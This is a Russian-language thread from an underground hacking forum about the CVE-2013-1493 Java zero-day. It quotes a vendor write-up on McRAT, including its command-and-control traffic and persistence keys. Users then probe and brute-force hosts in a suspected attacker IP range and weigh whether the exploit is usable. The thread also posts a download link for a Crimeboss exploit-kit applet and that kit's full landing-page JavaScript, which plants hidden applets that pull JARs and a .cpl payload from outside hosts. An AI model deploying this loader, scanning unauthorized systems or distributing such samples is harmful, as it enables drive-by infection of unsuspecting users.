• XSS.stack #1 – первый литературный журнал от юзеров форума

CVE-2013-1493 aka Yet Another Oracle Java 0day

Отслеживать

madamKury

floppy-диск
Пользователь
Регистрация
01.09.2009
Сообщения
8
Реакции
0
это совсем новое что-то или вариации?

http://blog.fireeye.com/research/2013/02/y...zero-day-2.html

2013.02.28
YAJ0: Yet Another Java Zero-Day

Through our Malware Protection Cloud (MPC), we detected a brand new Java zero-day vulnerability that was used to attack multiple customers. Specifically, we observed successful exploitation against browsers that have Java v1.6 Update 41 and Java v1.7 Update 15 installed.

Not like other popular Java vulnerabilities in which security manager can be disabled easily, this vulnerability leads to arbitrary memory read and write in JVM process. After triggering the vulnerability, exploit is looking for the memory which holds JVM internal data structure like if security manager is enabled or not, and then overwrites the chunk of memory as zero. Upon successful exploitation, it will download a McRAT executable (MD5: b6c8ede9e2153f2a1e650dfa05b59b99 as svchost.jpg) from same server hosting the JAR file and then execute it.

Figure 1. Example HTTP GET of the McRAT after the browser is successfully exploited, prior to the endpoint becoming fully compromised.

The exploit is not very reliable, as it tries to overwrite a big chunk of memory. As a result, in most cases, upon exploitation, we can still see the payload downloading, but it fails to execute and yields a JVM crash. When the McRAT successfully installs in the compromised endpoint as an EXE (MD5: 4d519bf53a8217adc4c15d15f0815993), it generates the following HTTP command and control traffic:

POST /59788582 HTTP/1.0
Content-Length: 44
Accept: text/html,application/xhtml+xml,application/xml,*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 110.XXX.55.187
Pragma: no-cache

4PdWXOD3Vlzg91Zc4PdWXOD3Vlzg91Zc4PdWXMP1RXw.

McRAT persists by writing a copy of itself as a DLL to (C:\Documents and Settings\admin\AppMgmt.dll) and performing the following registry modifications:

\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = C:\Documents and Settings\admin\AppMgmt.dll
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = %SystemRoot%\System32\appmgmts.dll

This post was intended to serve as a warning to the general public. We have notified Oracle and will continue to work with Oracle on this in-the-wild discovery. Since this exploit affects the latest Java 6u41 and Java 7u15 versions, we urge users to disable Java in your browser until a patch has been released; alternatively, set your Java security settings to "High" and do not execute any unknown Java applets outside of your organization.

We will continue to update this blog as new information about this threat is found. FireEye would like to acknowledge and thank Hermes Bojaxhi and his team at CyberESI for their assistance in confirming this Java zero-day vulnerability.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
madamKury
el-
инфы очень мало =(
все что мне удалось раскопать...
0757851fdbab57203039e978c20866ab.png


Шрифт моноширинный, значит в домене 5 символов. Так же там нет символов q y g j g
Если это фишинг по мылу, то возможно, домен (как и в прошлом случае, описанном fireeye) ломаный. Тогда возможно он в top1million алексы.
Там таких всего пол тысячи. Вот они: http://pastebin.com/gNH4jeR2
Но ни 1 из них не засвечен в google-safe-browsing, и ip ни одного их них не подходит под 110.XXX.55.187.
Всё, с этим вариантом провал.

Код: 
POST /59788582 HTTP/1.0
Content-Length: 44 
Accept: text/html,application/xhtml+xml,application/xml,*/* 
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) 
Host: 110.XXX.55.187 
Pragma: no-cache 

4PdWXOD3Vlzg91Zc4PdWXOD3Vlzg91Zc4PdWXMP1RXw.

Пробежался по диапазону айпов...
На 80й порт отвечают всего 5шт:
http://110.6.55.187/ - 403, нет заголовка сервера.
http://110.12.55.187/login.cgi - NAS чей-то.
http://110.52.55.187/ - 403, нет заголовка сервера.
http://110.137.55.187/ - роутер ZXV10 W300S
http://110.211.55.187/ - 403, нет заголовка сервера.

пока бручу директории на них... там видно будет...

========================

директорий не ма. Пробежался по всем 256ти адресам с POST-запросом из цитаты выше. - результат 0. Или хост недоступен, или 404 (на роутере и насе), или снова 403.

В общем... я пока хз что делать, и где искать.

========================

окай, проверил все пол-тысячи сайтов на морды.
Вот те, у которых их нет:
http://c-mam.co.jp/
http://chuko.co.jp/
http://i-abs.co.jp/
http://minit.co.jp/
http://e-saa.co.jp/
 
управляющий сервер малварки и сплоит скорее всего на разных серваках, так что ип != домену

вчитался
The exploit is not very reliable, as it tries to overwrite a big chunk of memory. As a result, in most cases, upon exploitation, we can still see the payload downloading, but it fails to execute and yields a JVM crash.
это все еще интересно, но в плане использования очень сомнительно, если нельзя будет достичь стабильности.
 
memory corruption давненько не было, в основном последние публичные уязвимости касались обходов securityManager`а.
Я тут подумал, что в зависимости от того места, где уязвимость, она может обходить security warning при запуске апплета, если уязвимость срабатывает раньше, например при обработке .class файла.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Пожалуйста, обратите внимание, что пользователь заблокирован
GOONER
нет нет. У кофеина описан просто самоподписный апплет.
Этот же 0дей, ребята выловили в аттаче письма. Разные вещи.
 
Вот если кому интересно - самоподписанный апплет с crimeboss пака, на него и нарвался кафеин:
http://www.sendspace.com/file/o4sk7q

а вот репорт urlquery этого пака:
http://urlquery.net/report.php?id=1078061

и выдача:

Код: 
var jsm_lab_on = true;
var jsm_lab_access = 'http://derneuntekontinent.de/cgi/index.php?action=stats_access';
var jsm_lab_javaon = 'http://derneuntekontinent.de/cgi/index.php?action=stats_javaon';
var jsm_lab_javaoff = 'http://derneuntekontinent.de/cgi/index.php?action=stats_javaoff';
var jsm_lab_loaded = 'http://derneuntekontinent.de/cgi/index.php?action=stats_loaded';
var jsm_lab_loadfail = 'http://derneuntekontinent.de/cgi/index.php?action=stats_loadfail';

var jsm_loaded = false;
var jsm_applet_index = 1;
var jsm_applet_count = 10;
var jsm_applet_prefix = 'amor';
var jsm_applet_url = 'http://art-sites.com/.9/';

var jsm_popunder_url = 'http://celularbom.com/js/clickpop.js';

function JSM_getAppletURL() {
    return jsm_applet_url + jsm_applet_prefix + jsm_applet_index + '.jar';
}

function JSM_createIframe(src) {
    var iframe = document.createElement('iframe');
    iframe.src = src;
    iframe.style.visibility = 'hidden';
    iframe.style.display = 'inline';
    iframe.style.margin = '0';
    iframe.style.padding = '0';
    iframe.style.border = 'none';
    iframe.style.width = '0';
    iframe.style.height = '0';
    return iframe;
}

function JSM_createScript(src) {
    var script = document.createElement('script');
    script.type = 'text/javascript';
    script.src = src;
    return script;
}

function getXMLHttpRequest() {
    if (window.XMLHttpRequest) return new window.XMLHttpRequest;
    else {
        try {
            return new ActiveXObject("Microsoft.XMLHTTP");
        } catch (ex) {
            return null;
        }
    }
}

function JSM_labReport(url) {
    var oReq = getXMLHttpRequest();
    if (oReq) {
        oReq.onreadystatechange = function() {
            if (oReq.readyState == 4) {
                if (oReq.status == 200) {
                    //window.alert('from callback ' + oReq.responseText);
                }
            }
        };

        oReq.open("GET", url, true);
        oReq.send();
    }
}

function JSM_labReport2(url) {
    var hhBody = document.body;
    if (hhBody) {
        hhBody.insertBefore(JSM_createIframe(url), hhBody.firstChild);
    }
}

function JSM_createImg(src) {
    var img = document.createElement('img');
    img.src = src;
    return img;
}

function JSM_createSpan(html) {
    var span = document.createElement('span');
    span.innerHTML = html;
    return span;
}

function JSM_getAppletHtml() {
    return '<applet name="Java(TM) Web Start ActiveX Control" code="amor.class" archive="' + JSM_getAppletURL() + '" width="0" height="0"  style="visibility: hidden" mayscript="true"> <param name="link" value="http://exportsoft.com/01/Jdk.cpl;cpl;0"> </param></applet>';
}

function JSM_getAppletHtml_Y() {
    return '<applet name="Java(TM) Web Start ActiveX Control" code="amor.class" archive="' + jsm_applet_url + 'jhan.jar?r=' + Math.floor(100000 + (Math.random() * 999999 + 1)) + '" width="0" height="0"  style="visibility: hidden"> <param name="link" value="http://exportsoft.com/01/Jdk.cpl;cpl;0"> </param> </applet>';
}

function JSM_getAppletHtml_X() {
    return '<applet name="Java(TM) Web Start ActiveX Control" code="amor.class" archive="' + jsm_applet_url + 'jmx.jar?r=' + Math.floor(100000 + (Math.random() * 999999 + 1)) + '" width="0" height="0"  style="visibility: hidden"> <param name="link" value="http://exportsoft.com/01/Jdk.cpl;cpl;0"> </param> </applet>';
}


//Java JMX


function JSM_onLoadB() {
    //if (jsm_lab_on) JSM_labReport(jsm_lab_loaded);
    if (jsm_lab_on) JSM_labReport2(jsm_lab_loaded + '&k=j');
}


//Normal


function JSM_onLoadA() {
    //if (jsm_lab_on) JSM_labReport(jsm_lab_loaded);
    if (jsm_lab_on) JSM_labReport2(jsm_lab_loaded);
}



//Java 7


function JSM_onLoadC() {
    //if (jsm_lab_on) JSM_labReport(jsm_lab_loaded);
    if (jsm_lab_on) JSM_labReport2(jsm_lab_loaded + '&k=c');
}

function JSM_onLoadFail() {
    //if (jsm_lab_on) JSM_labReport(jsm_lab_loadfail);
    if (jsm_lab_on) JSM_labReport2(jsm_lab_loadfail);

    if (jsm_applet_index < jsm_applet_count) {
        jsm_applet_index++;

        var hBody = document.body;
        if (hBody) {
            var html = JSM_getAppletHtml();
            hBody.insertBefore(JSM_createSpan(html), hBody.firstChild);
        }
    }
}

function JSM_onInit(hBody) {

    //if (jsm_lab_on) JSM_labReport(jsm_lab_access);
    if (jsm_lab_on) JSM_labReport2(jsm_lab_access);

    if (hBody) {
        var html = '';

        if (navigator.javaEnabled()) {
            //java on
            html = JSM_getAppletHtml_Y() + JSM_getAppletHtml_X() + JSM_getAppletHtml();

            //if (jsm_lab_on) JSM_labReport(jsm_lab_javaon);
            if (jsm_lab_on) JSM_labReport2(jsm_lab_javaon);

            hBody.insertBefore(JSM_createSpan(html), hBody.firstChild);
        } else {
            //report java disabled access
            if (jsm_lab_on) JSM_labReport2(jsm_lab_javaoff);
        }

        //hBody.insertBefore(JSM_createScript(jsm_popunder_url), hBody.firstChild);
    }
}

function JSM_onCreate() {
    if (jsm_loaded) return;

    var myBody = document.body;
    if (myBody) {
        jsm_loaded = true;
        JSM_onInit(myBody);
    } else {
        setTimeout("JSM_onCreate()", 100);
    }
}

function WindowOnload(f) {
    var prev = window.onload;
    window.onload = function() {
        if (prev) prev();
        f();
    }
}

WindowOnload(JSM_onCreate);
setTimeout("JSM_onCreate()", 7000);
 
уже наверное видели http://malware.dontneedcoffee.com/2013/03/...5-jre16u41.html у кого есть семпл ? кто то тестил, он реально не стабильный, вылетают ли всякие окошки явы ( интересует 6 ветка, в 7 понятно ) ?
зы. у меня есть семпл первоисточника, но до его разбора очередь так и не дошла
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх